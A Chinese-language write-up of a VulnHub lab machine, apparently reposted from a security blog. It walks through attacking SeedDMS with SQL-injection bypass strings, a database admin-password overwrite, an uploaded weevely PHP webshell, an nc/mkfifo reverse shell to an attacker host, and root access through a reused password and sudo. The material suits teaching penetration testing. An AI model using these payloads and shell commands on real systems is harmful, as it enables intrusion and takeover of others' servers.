舍一朝风月,得万古长空
靶机地址:https://www.vulnhub.com/entry/hack-me-please-1,731/
外网打点
主机发现&端口扫描
80端口这是一个静态页面
mysql测试是否可以远程连接(可)
白小羽
Tips :ERROR 2026 (HY000): TLS/SSL error: self-signed certificate in certificate chain,这个错误表示客户端与服务器之间建立安全连接时出现的SSL/TLS 证书验证错误
解决办法通常有两种方法:
-
添加参数 --skip-ssl -
添加参数 --ssl-mode=DISABLED
目录扫描看到一个html,不是php写的,进行目录爆破的时候就需要用到wfuzz或者gobuster
既然是静态页面,那么我们直接打开控制台,这里注释信息有一个 /seeddms51x/seeddms-5.1.22/
//确保这个js文件与我们服务器端点上安装的应用相同:/seeddms51x/seeddms-5.1.22/
访问这个应用
http://10.10.10.201/seeddms51x/seeddms-5.1.22/
经过一些列折腾后
' or 1=1 --+
' or 1=1 -- +
' or 1=1#
" or 1=1 --+
" or 1=1 -- +
" || 1=1 -- +
" || 1=1 --+
" || 1=1 #
继续信息收集,发现可以对这个上级目录进行扫描
gobuster dir -u http://10.10.10.201/seeddms51x -w /data/SecLists_Dict/Discovery/Web-Content/directory-list-1.0.txt -x html,txt,php,js
开放了,三个目录
/conf
/www
/pear
/conf/settings.xml
丢给AI总结(注意oscp考试绝对不允许使用AI)
有了数据库密码,那么就远程登录
┌──(root㉿kali)-[/data/demo]
└─# mysql -u seeddms -h 10.10.10.201 --skip-ssl -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or g.
Your MySQL connection id is 72
Server version: 8.0.25-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Support MariaDB developers by giving a star at https://github.com/MariaDB/server
Type 'help;' or 'h' for help. Type 'c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| seeddms |
| sys |
+--------------------+
5 rows in set (0.006 sec)
MySQL [(none)]> use seeddms
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [seeddms]> show tables;
+------------------------------+
| Tables_in_seeddms |
+------------------------------+
| tblACLs |
| tblAttributeDefinitions |
| tblCategory |
| tblDocumentApproveLog |
-------------------------------------------
| tblWorkflowTransitions |
| tblWorkflows |
| users |
+------------------------------+
43 rows in set (0.002 sec)
MySQL [seeddms]> select * from users;
+-------------+---------------------+--------------------+-----------------+
| Employee_id | Employee_first_name | Employee_last_name | Employee_passwd |
+-------------+---------------------+--------------------+-----------------+
| 1 | saket | saurav | Saket@#$1337 |
+-------------+---------------------+--------------------+-----------------+
1 row in set (0.002 sec)
发现Saket@#$1337登录不成功
MySQL [seeddms]> select * from tblUsers;
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
| id | login | pwd | fullName | email | language | theme | comment | role | hidden | pwdExpiration | loginfailures | disabled | quota | homefolder |
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
| 1 | admin | f9ef2c539bad8a6d2f3432b6d49ab51a | Administrator | [email protected] | en_GB | | | 1 | 0 | 2021-07-13 00:12:25 | 0 | 0 | 0 | NULL |
| 2 | guest | NULL | Guest User | NULL | | | | 2 | 0 | NULL | 0 | 0 | 0 | NULL |
+----+-------+----------------------------------+---------------+--------------------+----------+-------+---------+------+--------+---------------------+---------------+----------+-------+------------+
2 rows in set (0.001 sec)
解密失败,那还有一种方法就是修改数据了修改密码为123456 md5加密后e10adc3949ba59abbe56e057f20f883e
update tblUsers set pwd='e10adc3949ba59abbe56e057f20f883e' where login='admin';
修改后就能登录了
在mysql中还有一个信息是必须要收集的(这个配置不当能够直接getshell)
MySQL [seeddms]> SHOW VARIABLES LIKE 'secure_file_priv';
+------------------+-----------------------+
| Variable_name | Value |
+------------------+-----------------------+
| secure_file_priv | /var/lib/mysql-files/ |
+------------------+-----------------------+
1 row in set (0.019 sec)
继续登录的后台,点击添加文档,发现能上传文件
我们使用weevely生成一个php静态木马(它具有跨平台、隐蔽性好[增加免杀率]、支持多种功能等特点)
weevely generate cmd shell.php
把他上传上去
那么这个shell路径怎么获取呢,这里可以检索一下历史漏洞,这里有一个命令执行
查看一下
需要获取文档ID
example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd
完整payload如下
http://10.10.10.201/seeddms51x/data/1048576/10/1.php
内网渗透
使用weevely连接webshell
weevely terminal http://10.10.10.201/seeddms51x/data/1048576/10/1.php cmd
反弹shell
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.10.128 1234 >/tmp/f
创建交互式终端
python2 -c 'import pty; pty.spawn("/bin/bash")';
内网信息收集的时候,看到一个logrotate计划任务
www-data@ubuntu:/var/www/html/seeddms51x/data/1048576/10$ ls -al /etc/cron*
ls -al /etc/cron*
-rw-r--r-- 1 root root 1042 Feb 13 2020 /etc/crontab
/etc/cron.d:
total 36
drwxr-xr-x 2 root root 4096 Jul 2 2021 .
drwxr-xr-x 133 root root 12288 Jul 3 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rw-r--r-- 1 root root 285 Jul 16 2019 anacron
-rw-r--r-- 1 root root 201 Feb 13 2020 e2scrub_all
-rw-r--r-- 1 root root 712 Jun 20 2021 php
-rw-r--r-- 1 root root 191 Jul 2 2021 popularity-contest
/etc/cron.daily:
total 68
drwxr-xr-x 2 root root 4096 Jul 2 2021 .
drwxr-xr-x 133 root root 12288 Jul 3 2021 ..
-rw-r--r-- 1 root root 102 Feb 13 2020 .placeholder
-rwxr-xr-x 1 root root 311 Jul 16 2019 0anacron
-rwxr-xr-x 1 root root 539 Apr 13 2020 apache2
-rwxr-xr-x 1 root root 376 Dec 4 2019 apport
-rwxr-xr-x 1 root root 1478 Apr 9 2020 apt-compat
-rwxr-xr-x 1 root root 355 Dec 29 2017 bsdmainutils
-rwxr-xr-x 1 root root 384 Nov 19 2019 cracklib-runtime
-rwxr-xr-x 1 root root 1187 Sep 5 2019 dpkg
-rwxr-xr-x 1 root root 377 Jan 21 2019 logrotate
-rwxr-xr-x 1 root root 1123 Feb 25 2020 man-db
-rwxr-xr-x 1 root root 4574 Jul 18 2019 popularity-contest
-rwxr-xr-x 1 root root 214 Dec 7 2020 update-notifier-common
www-data@ubuntu:/var/www/html/seeddms51x/data/1048576/10$ logrotate --version
logrotate --version
logrotate 3.14.0
Default mail command: /usr/bin/mail
Default compress command: /bin/gzip
Default uncompress command: /bin/gunzip
Default compress extension: .gz
Default state file path: /var/lib/logrotate/status
ACL support: yes
SELinux support: yes
很遗憾,这个利用不了,版本太新(高)了
然后我想到了刚进来的那个网页moonlight,这里有一个权限提升
POC为c#计算机语言,大概率不适用于linux
想想看哪里还没有利用这是之前mysql中的用户表,存在一个用户
Saket@#$1337
我们查看/etc/passwd,是存在这个用户的
www-data@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ su saket
su saket
Password: Saket@#$1337
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
saket@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$
saket@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ sudo -l
sudo -l
[sudo] password for saket: Saket@#$1337
Matching Defaults entries for saket on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
User saket may run the following commands on ubuntu:
(ALL : ALL) ALL
saket@ubuntu:/var/www/html/seeddms51x/seeddms-5.1.22$ sudo -i
sudo -i
root@ubuntu:~# whoami
whoami
root
至此提权成功。
往期推荐
原文始发于微信公众号(泷羽Sec):【oscp】Hack_Me_Please,js信息泄露,二级目录遍历
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论